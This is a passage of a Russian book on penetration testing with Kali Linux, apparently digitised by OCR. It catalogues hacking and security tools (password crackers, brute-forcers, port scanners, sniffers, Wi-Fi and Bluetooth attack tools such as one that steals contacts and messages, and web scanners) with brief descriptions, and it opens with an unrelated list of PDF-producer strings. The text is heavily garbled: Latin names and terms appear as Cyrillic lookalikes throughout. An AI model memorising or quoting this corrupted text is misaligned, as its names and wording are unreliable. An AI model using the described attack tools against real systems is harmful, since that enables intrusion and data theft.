• АсгоЬаі Оізііііег Соттапсі 2.1 Гог 5ип05/8о1агіз (5РАКС) 

• СРЬ СЬозізсгірІ 8.15 

• Ьѵір5(к) 5.92Ъ Соругі;>Ьі 2002 КадісаІ Еуе 5оГі\ѵаге 

• МіКТеХ рсіГТеХ- 1.20а 

• АсгоЬаі Оізііііег 4.05 Гог ЛѴіпсІолѵн 

• АРРЬ СЬозіЗсгірі ѵіа СЪозіУГокі 

• Місгозой \ѴоМ 11.0 

• АРРЬ СЬозізсгірІ 8.51 

• (іѵірз(к) 5.95а Соругі^Ьі 2005 Касіісаі Еуе ЗоГпѵаге 

• АсгоЬаі Оізііііег 3.0 Гог ѴѴтёоѵѵз 

• Р5сгірі5.<111 Ѵегзіоп 5.2.2 

• рёГТеХ-1.40.9 

• АсгоЬаі Оізііііег 6.0 (Ѵ/ігкІо'А'з) 

• АРРЬ СЬозізсгірІ 7.04 

• сіѵірз(к) 5.86 Соругі^Ьі 1999 Касіісаі Еуе ЗоГіѵѵаге 

• СЬШ СЬозізсгірІ 6.51 

• МіКТеХ СРЬ СЬозізсгірІ 8.54 

• сІѵіряСк) 5.95Ь Соругі^Ьі 2005 Касіісаі Еуе 5ой\ѵаге 

• АсгоЬаі Оізііііег 5.0.5 (\ѴіпсІоѵѵ5) 

• сІѵірсіГт 0.13.2с, Соругі^М © 1998, Ьу Магк А. ІУіскз 
. ТеХ оиіриі 2005.06.06:1620 

. МіКТеХ раГГеХ-1.40.4 
. РЭРиЬ4РОІ5.0.2р1 (СОМЛѴіл32) 

• СопГегепсе Мапа§етепі Зегѵісез, Со11е(>е Зіаііоп, ТХ 

• рсИТеХ-1.0Ь-рдГсгурі 

• Р5Хогта1І2ег.Ггаше\ѵогк 

• Е5Р СЬозізсгірІ 815.02 

• МіКТеХ рйГГеХ-1.40.10 

• РОРІІЬ+РОІ 6.0.1 рі (СОМАѴІП32) 


Итак, мой список инструментов для сбора информации получился всего на семь 
пунктов. Те, кто заходил в раздел Іггіогтаііоп СаіИегіп§, знают, что там несколько 
десятков программ. Я рассмотрел самые, на мой взгляд, интересные. 


Глава 16. Лучшие хакерские программы 

Хакерские инструменты: список инструментов по безопасности для тестирования и 
демонстрации слабостей в защите приложений и сетей, эти инструменты 
предназначены для профессионалов по информационной безопасности. 

Источник: Ніір5://пО\л/Неге.пеі/Ье5і-НасІ<іпд-іооІ5/ 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


95 









Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Пароли 


Саіп & АЬеІ 

Саіп & АЬеІ — это инструмент по восстановлению пароля для 
операционной системы Місгозо^. Этот инструмент позволяет 

восстановить пароли различного рода посредством прослушивания 

сети. 

СасбеОитр 

СасИеОитр, лицензирована под СРЦ демонстрирует, как 
восстановить информацию из записей кэша: имя пользователя и 

М5СА5Н. 

]оИп іИе Кіррег 

•іоііп {Не Кіррег быстрый взломщик паролей, в настоящее время 
доступен на разного рода ІІпіх (официально поддерживаются 11 не 
считая различных архитектур), \Л/і псіохл/з, 005, Ве05 и ОрепѴМЗ. 

РЗСгаск 

01Л (графический интерфейс) для .ІоНп {Не Кіррег. РЗСгаск — это 
"морда" для ]оНп ТИе Кіррег ЦШ), т.е. графический интерфейс (СІІІ) 
для доступа к большинству функциям ЛК. 

Нѵсіга 

Очень быстрый взломщик входа по сети, программа поддерживает 
множество различных служб. Одна из самых больших дыр в 
безопасности — это пароли, об этом говорят все исследования по 
безопасности паролей. 

кеітрх 

кеітрх инструменте открытым исходным кодом, выпущен под 
модифицированной версией лицензии Арасбе Ысепзе 1.1. Он может 
быть использован для быстрой проверки полезности учётных 
данных по сети через 5МВ. 

Месіиза 

Месіиза предназначена для скоростного, массово параллельного, 
модульного брут-форса входа. Цель — поддерживать все службы, 
которые позволяют удалённую аутентификацию. 

ІМсгаск 

ІМсгаск — это высокоскоростной инструмент взлома паролей 
аутентификации. Он был создан в помощь компания по 
обеспечению безопасности их сетей посредством активного 
тестирования всех их хостов и сетевых устройств на предмет 
выявления слабых паролей. 

Орбсгаск 

Орбсгаск — это взломщик паролей ѴѴіпсІоѵѵз, основанный на 
радужных таблицах. Это очень эффективная реализация радужных 
таблиц, осуществлённая изобретателем данного метода. 
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ВаіпЬоѵѵСгаск 

ВаіпЬоѵѵСгаск — это много целевая реализация теории радужных 
таблиц РЫІірре ОесЫіп. Про радужные таблицы в Википедии. 

рИгазеп | сІгезсЬег 

рНгазеп | сі гезсЬег (р |сІ) — это модульный и мульти процессный 
обходчик паролей для их взлома. Он поставляется с рядом 
плагинов, а простые АРІ позволяют простую разработку новых 

плагинов. 

ІСР 

Главная цель программы І.СР — это аудит и восстановление 
пользовательского пароля в ѴѴіпсІоѵѵз І\ІТ/2000/ХР/2003. 

СгипсН 

СгипсГі — это генератор списка слов, в котором вы можете задать 
набор стандартных символов или любых других символов по своему 
желанию, сгипсіі сгенерирует все возможные комбинации и 

пермутации. 

Рсгаскгір 

Обычно, программы появляются исходя из потребностей. Ситуация 
с Іггаскгір не исключение. Я не особо использую формат гір, но 
недавно мне понадобился взломщик паролей. Рсгаскіір — это 
программа для взлома паролей гір. 

Епитіах 

ЕпитІАХ — это инструмент для брут-форса имени пользователя 
протокола ІпТег Азіегізк ЕхсГіап§е версии 2 (ІАХ2). епитІАХ может 
работать в двух различных режимах: последовательное 

предположение имени пользователя или атака по словарю. 

\А/усІ 

ѵѵуб.рі был рождён из следующих двух ситуации: 1. Необходимо 
выполнить тест на проникновение, а дефолтный список слов не 
содержит валидного пароля. 2. Во время судебно-медицинской 
экспертизы при расследовании преступлений файл должен быть 
открыт без знания пароля. 

Вгиіег 

Вгіііег — это параллельный брутфорсер сетевого входа для \Л/іп32. 
Цель этого инструмента — продемонстрировать важность выбора 
сильного пароля. Цель Вгиіег — это поддержка различных служб, 
которые позволяют удалённую аутентификацию. 

ТЬе5$Н 

Ьгиіеіюгсег 

Инструмент для выполнения атаки по словарю на 55Н серверы. Это 
простой инструмент, вы задаёте целевой сервер, целевой аккаунт, 
список слов, порт и ждёте. 

1 осІо\л/ер 

Іюсіоѵѵер — это инструмент для анализа стойкости пароля аккаунта в 
веб-серверной системе І-ОІиз Оотіпо. Инструмент поддерживает как 
сессионную, так и базовую аутентификацию. 
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ЗЗНаНег 

ЗЗНаНег использует техники брут-форса для определения, как зайти 
на сервер 55Н. Она тщательно пробует каждую комбинации из 
списка имён пользователей и паролей для определения верной 
комбинации. 

Сканирование 


Атар 

Атар — это инструмент сканирования следующего поколения, 
который идентифицирует приложения и службы, даже если они не 
прослушивают порт по умолчанию. Это достигается установлением 
фиктивной связи и анализом ответа. 

Ог.Могепа 

Ог.Могепа — это инструмент для подтверждения настройки правил 
в файерволе. Настройка файервола выполняется комбинированием 
более чем одного правила. 

Рігеѵѵаік 

Рігеѵѵаік является инструментом для активно разведки сети, он 
пытается определить, какой уровень (слой) четвёртого протокола 
пройдёт на заданный ІР устройства перенаправления. 

Рігеѵѵаік работает отправляя пакеты ТСР или ІЮР с ТТІ_ на единицу 
больше, чем целевой шлюз. 

ІМеІсаІ 

NеТсаТ — это особенная утилита, которая читает и пишет данные в 
сетевые соединения, используя протокол ТСР/ІР. Она создана как 
надёжный "фоновый" инструмент, который может быть 
использован напрямую или с лёгкостью задействован другой 
программой. 

Іке 5сап 

Іке-зсап — это инструмент командной строки, который использует 
протокол ІКЕ для обнаружения, снятия отпечатков пальцев и 
тестирования серверов ІРЗес ѴРІМ. Он доступен для Ыпих, ІІпіх, 

Мас05 и \Л/іпсІоѵѵ5 под лицензией 0Р1_. 

ІМтар 

ІМтар ('ІМеІѵѵогк Маррег' — "сетевой картограф") — это бесплатная 
утилита с открытым исходным кодов для исследования сетей или 
для аудита безопасности. Она создавалась для быстрого 
сканирования огромных сетей, но также прекрасно работает и в 

отношении единичных хостов. 

2ептар 

2ептар — это официальная графическая оболочка (ОШ) для ІМтар 
Зесигііу Зсаппег. Она мультиплатформенная (Ыпих, ѴѴіпсІоѵѵз, Мае 05 
X, В50 и т.д.). 
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Опезіхіѵопе 

опезіхіѵопе это сканер ЗЫМР, который использует технику развёртки 
для достижения высокой производительности. Он может 
просканировать всю сеть класса В за 13 минут. 

ЗирегЗсап 4 

Мощный сканер портов ТСР, пингер, резолвер. ЗирегЗсап 4 — это 
обновление ЗирегЗсап — крайне популярного сканера портов под 
ѴѴіпсІоѵѵз ЗирегЗсап 

Аиіозсап 

Аи1ю5сап-Ые1:\л/огк — это сканер сети (обнаружение и управление 
приложениями). Для сканирования вашей сети не требуется 
настройка. Главная цель — вывести список подключённого 
оборудования в вашей сети. 

Кпоскег 

Кпоскег — это простой и лёгкий в использовании сканер 
безопасности портов ТСР, написан на С, анализирует все службы, 

запущенные на этих портах. 

Ызаі 

ЫЗАТ — это надёжный сканер, который предназначен для 
различного рода широких сканирований, сохраняя стабильность на 
протяжении дней. Сканирование на нескольких пользовательских 
машинах (локальное незаметное низкоприоритетные опции 
сканирования). 

ОиШиіРВІЧ.1 

РВЫ] — это набор инструментов для мониторинга изменений в сети 
в течение долгового времени. Он выполняет это посредством 
проверки целевых машин на изменения. Собираемая информация 
включает подробности о запущенных службах на них, а также 
состояние служб. 

ЗсапРВЖ 

ЗсапРВШ выполняет сканирование ІЫтар, а затем сохраняет 
результаты в базе данных. ЗсапРВШ сохраняет информацию о 
просканированных машинах. ЗсапРВМ сохраняет ІР адреса, 
операционные системы, имена хостов и бит ІосаІГіозІ. 

йІуреаГіеасІ 

По умолчанию, СІуре ргоху зсгірі; имеет несколько ограничений на 
какие хосты/порты он может иметь доступ. В дополнение, ргоху 

5сгі рТ нормально отображает сообщения об ошибках, связанные с 

СІІКІ.. 

ІІпісогпзсап 

ІІпісогпзсап — это новый движок сбора и корреляции информации, 
созданный для сообществ по тестированию и исследованию 

безопасности. 
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ТСР Раз* 5сап 

Очень-очень быстрый сканер іср портов под Ыпих. Работает очень 
быстро. Может одновременно сканировать множество хостов / 

портов + диапазонов 

Миііі ТЬгеасІесІ 

ТСР Рог* Зсаппег 

ЗЮ 

Этот инструмент может быть использован для сканирования портов 
конкретного ІР. Он также может описать каждый порт стандартным 
именем (известных и зарегистрированных портов). 

МіпкЗѵѵеерег 

Міп§5\л/еерег — это инструмент разведки сети, предназначенный 
для облегчения высокоскоростного выявления узлов и их 
идентификации в большом адресном пространстве. 

ІІтарШРМР Мар) 

ІІтар (ІІРЫР Мар) пытается сканировать открытые порты ТСР на 

хостах за включённым ІЭРЫР ІпТетеТ Оаіеѵѵаѵ Оеѵісе(ІСЮ) ЫАТ. 

ЗепсІІР 

ЗепсІІР имеет огромное количество опций командной строки чтобы 
указать содержимое каждого заголовка І\ІТР, ВСР, КІР, ШРп§, ТСР, 

ІЮР, ІСМР или сырых ІРѵ4 и ІРѵб пакетов. Программа также 
позволяет добавлять в пакеты любые данные. 

РогіЗепігѵ 

Инструменты Зепіту обеспечивают безопасность служб на уровне 
хоста для платформ ІІпіх. РогіЗепігу, І_о§сІіеск/І-0§5еп1:гу и НозіЗепІту 
защищают от сканирования портов, автоматизируют аудит файлов 

журналов и выявляют продолжительную подозрительную 

активность логина. 

СиггРогІз 

СиггРогіз отобразить список открытых в данный момент портов 

ТСР/ІР и ІЮР на вашем ПК. Также для каждого открытого порта в 
построенном списке будет отображена информация о процессе, 
который открыл этот порт. 

№сап 

Сам по себе ЫЗсап — это сканер портов, который использует метод 
соппесіО для составления списка открытых портов хоста. Отличие от 
большинства других сканеров портов — это гибкость и скорость. 

ЫеТѵѵогкАсТіѵ 

5сап 

Ие1;\л/огкАс1;іѵ Рогі; Зсаппег — это инструмент исследования и 
администрирования сети, который позволяет сканировать и 
исследования внутренние І_АЫ и внешние ѴѴАІМ. 

ВІиез Рог* 

Зсаппег 

Хороший сканер портов — просто один из базовых инструментов 
каждого, кто-то всерьёз интересуется интернет-штучками. 
ВІиезРогіЗсап — это, я думаю, самый быстрый сканер для 32-битных 
ѴѴіпсІоѵѵз, из тех, которые могут быть найдены в сети. 
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2Мар 

2Мар сканер с открытым исходным кодом, который даёт 

возможность исследователям просканировать сети размером с весь 

Интернет. На единственной машине с хорошим каналом 2Мар 
выполнить полное сканирование всех адресов ІРѵ4 в течение 45 
минут, упираясь в теоретический придел гигабитных Еібегпеі:. 

зиЬсІотаіп- 

Ьгиіеіюгсег 

ЗиЬсІотаіп-ЬгиІеІогсег — это многопоточный инструмент 
написанной на РуіЬоп для перечисления субдоменов из файла 
словаря. Особенно полезен для поиска админок ил и других 
хитроумных веб-практик. 

ігсзпарзЬоІ: 

ІгсзпарзНоІ: — это бот, написанный на РуіИоп, которые 
подсоединяется к серверу чтобы извлечь пользовательские 
хостмаски, имена и принадлежность каналов; также используется 
для создания карты на основе наскрёбанных данных. Полезен для 
разведки на ІКС сервере полном подозрительных ботов. 
Поддерживает 50СК5 и ТОР. 


Сниффинг 


ѴѴігезбагк 

ѴѴігезбагк используется сетевыми специалистами по всему миру для 
решения проблем, анализа, разработки программного обеспечения и 
протоколов, а также в образовании. 

СНаозгеасІег 

Бесплатный инструмент для отслеживания ТСР/ІЮР/... сессий и 
извлечения данных приложений из "подсмотренных" или сдампленных 
(Ісрбитр) логов. Это "всеядная" программа, она извлекает сессии 

Іеіпеі, РТР файлы, НТТР передачи (НТМІ_, <31Р, 1РЕО, ...), 5МТР письма,... 
из захваченных данных внутри сетевого трафика. 

сізпИТ 

сізпИТ — это коллекция инструментов для сетевого аудита и 
тестирования на проникновение. сізпіТТ, ТіІезпагТ, таіІзпагТ, тз^зпагі 7 , 
игІзпагТ, и ѵѵеЬзру пассивно следят за сетью в поисках интересной 
информации. 

ЕНегсар 

ЕНегсар — это инструмент для атаки человек-по-середине в І_АІ\І. Её 
особенностями являются сниффинг живых соединений, фильтрация 

контента на лету и многие другие интересные трюки. 

ЫеІѵѵогкМіпег 

ЫеІѵѵогкМіпег это инструмент для криминалистического анализа сети 
(Ыеіѵѵогк Рогепзіс Апаіузіз ТооІ — ЫРАТ) под ѴѴіпсІоѵѵз. ЫеІѵѵогкМіпег 
может быть использован как пассивный сетевой сниффер/перехватчик 
пакетов для определения операционных систем, сессий, имён хостов. 
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открытых портов И т.д. 

ВаѵѵСар 

ВаѵѵСар — это бесплатная программа командной строки, сетевой 
сниффер под ѴѴіпсІоѵѵз, который использует сырые сокеты. 

Зріке ргохѵ 

Не все приложения делаются одинаково, и, следовательно, многие 
должны анализироваться индивидуально. 5РІКЕ Ргоху — это инструмент 
профессионального уровня для поиска уязвимостей уровня 
приложений в веб-приложениях. 

Тсрсіитр 

Тсрсіитр выводит заголовки пакетов на сетевом интерфейсе, которые 

соответствуют логическому выражению. 

Тсргеріаѵ 

Тсргеріау это набор инструментов под лицензией ВЗЭ написанных 

Аагоп Тигпег для операционных систем ІЛМІХ (и ѴѴіп32 под Су§\л/іп), 
которые дают вам возможность использовать ранее захваченный 
трафик в формате ІіЬрсар для тестирования различных сетевых 
устройств. 

Рігпі ЗпіІТег 

Рігпі — это первый в мире нативный (родной) сетевой сниффер для 
іРЬопе. ѴѴі-РІ іРЬопе'а имеет некоторые большие недостатки в 
аппаратном обеспечении, которые препятствуют должным образом 
перевести устройство в режим рготізсіоиз. 

ІІ^азо^І; ЗпМ 7 

ІЯазоТС 5пі^ — это сетевой сниффер, предназначенный для захвата и 
анализа покетов проходящих через сеть. Используя драйвер пакетов, он 
запрашивает все пакеты в сети, в которой находится драйвер сетевой 
карты (даже если пакеты не адресованы этому компьютеру). 




Перечисление 


сіпзепит 

Цель Опзепит — собрать так много информации о домене, как это 

возможно. 

ЭитрЗес 

ЗотагЗоШз ОитрЗес — это программа аудита безопасности для 
МісгозоІТ ѴѴіпсІоѵѵз І\ІТ/ХР/200х. 




ШАР Вгоѵѵзег — это главный клиент директорий ШАР в стиле Ехріогег, 

ШАР Вгоѵѵзег - 

доступный для платформ \Л/іп32. 




ІМВТЕпит 

ІМеШІОЗ Епитегаііоп ІДіІіІу (ІМВТЕпит) — это утилита под ѴѴіпсІоѵѵз, 
которая может быть использована для перечисления информации 
ІМеШІОЗ от одного хоста или диапазонов хостов. 
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пЬізсап 

Этот инструмент может сканировать на открытые ІМЕТВІ05 имена 
серверов в локальной или удалённой ТСР/ІР сети, а это является 
первым шагов для поиска открытых общих ресурсов. 

ѵѵті сІіепТ 

Это реализация клиента ОСОМ/ѴѴМІ, основанная на источниках 

5атЬа4. Программа использует механизмы РРС/ЭСОМ для 
взаимодействия со службами ѴѴМІ на машинах ѴѴіпсІоѵѵз 2000/ХР/2003. 

Опзтар 

Опзтар, в первую очередь, предназначен для использования 
пентестерами во время фазы сбора информации при оценке 
безопасности инфраструктуры. 

Эпзгесоп 

Одной из лучших функций этого инструмента, дающей прекрасные 
результаты, является перечисление служебных записей 5КѴ. 

Опзігасег 

Опзітасег определяет, откуда заданный сервер доменных имён (0І\І5) 
получает свою информацию и следует по цепочке 0І\І5 серверов 

приходя к тому серверу, которые является первоначальным 

источником данных. 

Сетевые 


инструменты 


Ітакгоиіе 

1та§гои1:е перехватывает, модифицирует и перезаписывает исходящий 
трафик, предназначенный для указанного хоста. 

Ьріпй 

Нріп§ — ассемблер/анализатор командный строки ориентированный 
на ТСР/ІР пакеты. 

Зсарѵ 

5сару — это мощная интерактивная программа манипуляции 
пакетами. Она способна подделывать или декодировать пакеты 

многих протоколов, отправлять их по проводу, захватывать их, 

проверять на соответствие запросы и ответы и многое другое. 

ЗіиппеІ 

Программа зіиппеі предназначена для работы обёрткой шифрования 

551. между удалённым клиентом и локальным (запускаемые іпеісі) или 
удалённым сервером. 

ісрігасегоиіе 

ТсрТгасегоиТе это использующая ТСР пакеты реализация трассировки. 
Обычно используют ігасегои1:е(8), отсылающую либо ІЮР, либо ІСМР 
ЕСНО пакеты с ТИ один и увеличением ТП вплоть до достижения 

пункта назначения. 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 






























Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Ігасеіср 

Ігасеіср — трассирующая утилита командной строки под \А/ІN32, 
которая использует пакеты ТСР 5ѴІ\І, а не ІСМР/ІЮР пакеты, которые 
обычно используются для этого в других реализациях, что приводит к 
обходу шлюзов, блокирующих традиционные пакеты трассировки. 

Уегзіпіа 

Ѵегзіпіа — сетевой инструмент, созданный для получения 
преимущества из некоторых слабостей различных сетевых протоколов. 
Программа анализирует и тестирует развёрнутые сети и системы. 

№тезіз 

Ыетезіз — это утилита командной строки под 11NIX подобные и 
\Л/і псіохл/5 системы для создания и инжекта пакетов. Ыетезіз хорошо 
подойдёт для тестирования систем обнаружения вторжений в сеть 
(ІМеІѵѵогк Іпішзіоп Оеіесііоп Зузіетз), файерволов, ІР стеков и 
множества других задач. Будучи утилитой командной строки, ІМетезіз 
великолепно подходит для автоматизации и скриптинга. 


Беспроводные 


Аігсгаск-пй 

Аігсгаск — программа по взлому ключей 802.11 ѴѴЕР и ѴѴРА-Р5К, она 
может восстановить ключи, когда достаточно захвачено пакетов с 

данными. 

Кізтеі: 

Кізтеі: это детектор беспроводных сетей 802.11 Іауег2, сниффер 
система выявления вторжения. Кізтеі; будет работать с любыми 
беспроводными картами, которые поддерживают режим сырого 
мониторинга (гаѵѵ топі1:огіп§ — гітоп) и может снифить 
трафик 802.11Ь, 802.11а и 802.11§. 

ЫеіБіитЫег 

1\1е1:51:итЫег поставляет инструменты, которые помогут вам 
обнаружить стандарты 802.11 а/Ь/к \Л/І_АІ\І. Хотя вардрайвинг является 
главным главным использованием этой программы, она также может 
быть использована для верификации сетевых настроек. 

АігСгаЬ \Л/іРі 

Рабат 

АігСгаЬ \Л/іРі Кабаг — это инструмент для отображения информации о 
базовых станциях Арріе Аігрогі; и других ѴѴіРі (802.11Ь/§/п) 
беспроводных точек доступа. 

АігМоЬіІе айепі: 

Клиентское приложение загружается на ваш РйА или мобильный 
телефон ѴѴіпбоѵѵз где оно будет работать в тихом режиме в фоне. 

Если приложение находит мошенническую точку доступа, то она 
будет исследовать ТД на предмет является ли она прямой угрозой 
для вашей сети. 

АігКабаг 2 

АігКабаг позволяет вам сканировать на наличие открытых сетей и 
помечает их как избранные или фильтрует их. Просматривайте 
детальную сетевую информацию, график уровня сигнала сети и 
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автоматически подключайтесь к открытым точка в радиусе 

доступности. 

і5іитЫег 

і5іитЫег — это лидирующий инструмент по обнаружению 
беспроводных сетей для Мае 05 X, он имеет плагины для нахождения 
сетей АігРогІ:, ВІііеТооТН устройств, служб Вощ'оиг и информацию по 
расположению с вашим Мае. 

КізМАС 

КізМАС — это приложение с открытым исходным кодом, бесплатное, 
которое является сниффером/сканером для Мае 05 X. У него есть 
преимущества по сравнению с Мас51итЫег / і5іитЫег/ І\Іеі5іитЫег 
в том, что оно использует режим наблюдения и пассивное 

сканирование. 

ѴѴігеІеззМоп 

ѴѴігеІеззМоп — это программный инструмент, который позволяет 
пользователям мониторить статус беспроводного \Л/іРі адаптера(ов) и 
собирать информацию о близлежащих беспроводных точках доступа 

и хот-спотах в реальном времени. 

ѴізІшпЫег 

ѴізІитЫег это сканер беспроводных сетей, написан на АиіоІТ для 

Ѵізіа, ѴѴіпсІоѵѵз 7, апб ѴѴіпсІоѵѵз 8. ѴѴіРЮВ — это база данных, 
написанная на РНР и хранящаяся в файлах ѴізІшпЫег Ѵ51. Хранит 
треки о всех точках доступа с СР5, картах в кті, графиках сигнала, 

статистики и прочем. 

\Л/аѵе5і:итЫег 

\Л/аѵе5і:итЫег — это консольный составитель карт сетей, основанных 
на 802.11 под Ыпих. Он рапортует о базовой информации ТД, такой 
как канал, ѴѴЕР, Е55Ю, МАС и т.д. 

Хіггиз ѴѴі-Рі 

Іпзресіюг 

Хіггиз \Л/і-Рі Іпзресіюг — это мощный инструмент для управления и 
решения проблем с ѴѴі-Рі в компьютерах с ѴѴіпсІоѵѵз ХР 5Р2 и более 
поздних, ѴізТа, или 7. Создан для тестирования характеристик 
целостности и производительности вашего ѴѴі-Рі соединения. 

АігМайпеІ: ѴоРі 

Апаіугег 

АігМа§пе1; ѴоРі Апаіугег — единственное в индустрии решение для 
разрешения проблем голос-через-\Л/І.АІ\І в полевых условиях. ѴоРі 
Апаіугег обеспечивает полный анализ зашифрованного ѴѴІ.АІМ 
трафика, оценивает все звонки сточки зрения качества звонка и 
активно идентифицирует проблемы всех видов, включая проблемы с 
телефоном, проблемы с роумингом, проблемы с Цо5 и КР. 

Программа платная — это похоже на рекламную вставку — 
оставлю из уважения к труду авторов подборки. 
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Аігрѵѵп 

Аігрѵѵп — это фреймворк для 802.11 (беспроводных) инжектов 
пакетов. Аігрѵѵп прослушивает входящие беспроводные пакеты и 
если дата соответствует заданному в файлах настройки образцу, в 
пользовательское содержимое вставляется "зрооіесі" от 
беспроводной точки доступа. Сточки зрения беспроводного клиента, 
аігрѵѵп становится сервером. 

\Л/іЯ5саппег 

ѴѴіЯЗсаппег — это инструмент, который был создан для обнаружения 
беспроводных узлов (например, точек доступа и беспроводных 
клиентов. Он распространяется по лицензии СРІ.. 

Он работает с картами СІ5СО® сагсі и ргізт картой с драйвером бозіар 
или драйвером ѵѵІап-п§, ргізт54§, Негтез/Огіпосо, Аібегоз, Сепігіпо, 

Встроена система Ю5 для выявления аномалий вроде узурпации 

МАС. 


ВІиеТооІб 


Нагаісізсап 

Сканер Віиеіооіб под Ыпих и Мае 05 X. НагаІсІ 5сап способен выявить 
мажорные и минорные классы устройств, а также попытке резолвить МАС 
адрес устройства для большинства известных вендоров Віііеіооіб МАС. 

РТ54ВТ 

РТ54ВТ — передовой анализатор протокола Віиеіооіб. Разработчики и 
инженеры по тестированию полагаются на РТ54ВТ когда проходят цикл 
разработки, отладки, тестирования, верификации и квалификации. 

ВІие5саппег 

ВІиеЗсаппег — это Ьазб скрипт, который реализует сканер Віиеіооіб 
устройств. Этот инструмент создан для извлечения всей возможной 
информации из Віііеіооіб устройства без необходимости сопряжения. 

ВІоооѵег II 

ВІоооѵег II — это инструмент для аудита, основан на Іаѵа (12МЕ). Он 
существует в виде версии ВІоооѵег II для аудита мобильных 12МЕ и в 
издании для производителей. Простая утилита для тестирования 
уязвимостей. 

ВТЗсаппег 

ВТЗсаппег для ХР — это инструмент аудита окружения Віиеіооіб под 
МісгозоД ѴѴіпсІоѵѵз ХР, реализация использует библиотеки Ыиесоѵе 
(открытую реализацию 158-82 Віиеіооіб АРІ для Іаѵа). 

ВІиеЗрат 

ВІие5рат ищет всевозможные устройства ЫиеІооіН и отправляет на них 
файл (спамет их) если они поддерживают ОВЕХ. По умолчанию будет 
отправлен маленький текст. Для настройки сообщения, которое должно 
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быть отправлено, вам нужен наладонник с картой 50/ММС сагб, там вы 
создаёте директорию /РАІМ/рго§гат5/ВІие5рат/5епсІ/ и кладёте туда 
файл (будут работать файлы любого типа ,)р§ всегда клёво) который вам 
хотелось бы отправить. 

ВТСгаѵѵІег 

Приложение используется для поиска Віиеіооіб устройств и 
обеспечиваемых ими служб. Запустите на устройстве с поддержкой 12МЕ, 
МЮР 2.0 и 15К082 (Іаѵа АРІ для Віиеіооіб) 

ВІиесІіѵіпй 

ВІиесІіѵіп§ — это набор для тестирования на проникновение ВІиеІооіН. 

Он реализует атаки вроде ВІиеЬи§, ВІиеБпаг^, ВІиеЗпаНч--!-, ВІиеЗтаск, 
имеет аткие особенности как спуфинг адреса Віиеіооіб, шел АТ и сокета 
КРСОММ и реализация инструментов вроде сапл/Ызрегег, Ьзз, генератор 
пакетов 1.2САР, сбрасыватель соединений І.2САР, сканер КРСОММ и 
режим сканирования §геепрІацие зсаппіп§ тобе (используя более чем 
одно Исі устройство). 

ВІиезпаН'ег 

ВІиезпагІ'ег крадёт информацию из беспроводных устройств через 

ВІиеІооіИ соединение. Связь может быть между мобильными 
телефонами, РОА или компьютерами. Вы можете иметь доступ к 
календарю, списку контактов, почтовым и текстовым сообщениям. 


Веб сканеры 


Агасбпі 

АгасЬпі — это полностью автоматизированная система, которая в 
полную силу проверяет ваш веб-сайт "на вшивость". Как только 
сканирование запущено, это приложение больше не будет беспокоить 
вас, вмешательство пользователя больше не требуется. 

Вигр ЗиЛе 

Вигр ЗиЛе — это интегрированная платформа для выполнения 
тестирования безопасности веб-приложений. 

САІ.9000 

САІ.9000 — это коллекция инструментов тестирования безопасности веб¬ 
приложений, дополненная функциями установки веб-прокси и 
автоматических сканеров. САІ.9000 даёт вам гибкость и 
функциональность, которая вам нужна для более эффективных усилий 

при ручном тестировании. 

САТ 

САТ создан для удовлетворения потребностей при ручном тестировании 
на проникновение веб-приложений для более комплексных, 
требовательных задач в тестировании приложений. 
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СоокіеОіййег 

Соокіейі§§ег помогает выявить слабое создание куки и небезопасные 
реализации управление сессиями в веб-приложениях. Этот инструмент 
работает собирая и анализируя кукиз, которые генерируются веб¬ 
приложением для множества пользователей. 

ОІКВ 

ОІРВ — это сканер веб контента. Он ищет существующие (и/или скрытые) 
веб объекты. В основе его работы лежит поиск по словарю, он 
формирует запросы к веб-серверу и анализирует ответ. 

РісІсІІег 

РісІсІІег — это отладочный веб-прокси, который записывает весь трафик 
НТТР(5) между вашим компьютером и Интернетом. РісІсІІег позволяет 
вам инспектировать весь НТТР(5) трафик, устанавливать точки 
прерывания и "играться" с входящими и исходящими данными. 

Сатіа 

Сатіа будет искать слабые точки — Х55(межсайтовый скриптинг) и 5Щ- 
инъекции — а также ошибки валидации ІІВІ. параметра. Кто может 
знать, какой параметр является слабым параметром? Сатіа будет 
полезной в поиске уязвимостей [ Х55, ошибок валидации, 5Щ- 
инжектов]. 

СгепсІеІ-5сап 

Инструмент для автоматического сканирования безопасности веб¬ 
приложений. Также присутствует много функция для ручного 

тестирования на проникновение. 

НТТгаск 

НТТгаек — это бесплатная и простая в использовании утилита оффлайн 
браузера. Она позволяет вам загружать сайт из Всемирной Сети на 
локальный диск, создавать рекурсивную структуру каталогов, получать 
НТМІ_, картинки и другие файлы с сервера на ваш компьютер. 

ииін 

ииіь — это инструмент, написанный на РегІ для аудита веб-приложений. 
Этот инструмент анализирует веб-страницы в поиска тэга <1югт>, 
который обычно перенаправляет на динамичные страницы, на которых 
можно искать ЗЩ-инъекции и другие слабости. 

І\Іік1:о2 

N і кТо — это сканер веб-серверов с открытым исходным кодом (СРІ_), он 
выполняет полное тестирование веб-серверов по множеству 
параметров, включая более 6500 потенциально опасных файлов/ССІ. 

Рагоз 

Программа под названием 'Рагоз' для людей, которые нуждаются в 
безопасности их веб-приложений. Она бесплатная и полностью 

написана на ]аѵа. 

РоѵѵеНшггег 

Роѵѵегігіггег — это высоко автоматизированный и полностью 
настраиваемый веб-фаззлер (основанный на НТТР протоколе фаззлер 
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приложений), он основан на многих других доступных фаззлеров с 
открытым исходным кодом и информации, собранной из ряда 

источников безопасности и веб-сайтов. 

РгохуЗсап.рІ 

ргохуЗсап.рІ — это инструмент безопасного тестирования на 
проникновение для сканирования хостов и портов через веб прокси 
сервер. Особенности включают различные НТТР методы, такие как СЕТ, 
СОІМІМЕСТ, НЕАЭ, а также диапазоны хостов и портов. 

Каіргоху 

Полуавтоматический, в значительное мере пассивный инструмент 
аудита безопасности веб-приложений, оптимизирован на точное и 

чувствительное выявление и автоматическую аннотацию потенциальных 

проблем и связанных с безопасностью образцов построения, 
основанных на наблюдении существующего, генерируемого 
пользователем трафика в комплексной среде ѵѵеЬ 2.0. 

ЗсапЕх 

Это простая утилита, которая запускается против целевого сайта и ищет 
внешние ссылки и вредоносные кроссдоменные инжекты. Т.е. она 
выявляет сайты, которые уязвимы к Х55 и в которых уже подложен 

инжект. 

Зсгаѵѵіг 

Зсгаѵѵіг, создана ИР ѴѴеЬ Зесигііу КезеагсН Огоир совместно М5РС, если 
